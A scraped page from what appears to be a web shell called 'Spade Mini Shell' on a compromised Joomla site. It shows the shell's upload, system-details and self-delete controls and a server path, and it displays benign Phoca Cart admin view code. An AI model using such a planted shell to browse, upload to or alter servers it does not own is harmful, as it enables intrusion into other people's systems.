Spade

Mini Shell

Directory:~$ /home/lmsyaran/www/administrator/components/com_phocacart/views/phocacartwizard/
Upload File

[Home] [System Details] [Kill Me]
Current File:~$ /home/lmsyaran/www/administrator/components/com_phocacart/views/phocacartwizard/view.html.php

<?php
/* @package Joomla
 * @copyright Copyright (C) Open Source Matters. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * @extension Phoca Extension
 * @copyright Copyright (C) Jan Pavelka www.phoca.cz
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
 */
defined( '_JEXEC' ) or die();
jimport( 'joomla.application.component.view' );

class PhocaCartCpViewPhocaCartWizard extends JViewLegacy
{
	protected $t;
	protected $r;
	protected $s;
	protected $page;

	function display($tpl = null) {

		$app				    = JFactory::getApplication();
		$this->page		        = $app->input->get('page', 0,
'int');
		$this->t				= PhocacartUtils::setVars('wizard');
		$this->r				= new PhocacartRenderAdminview();
		$this->s                = PhocacartRenderStyle::getStyles();


		$media = new PhocacartRenderAdminmedia();

		parent::display($tpl);
	}
}
?>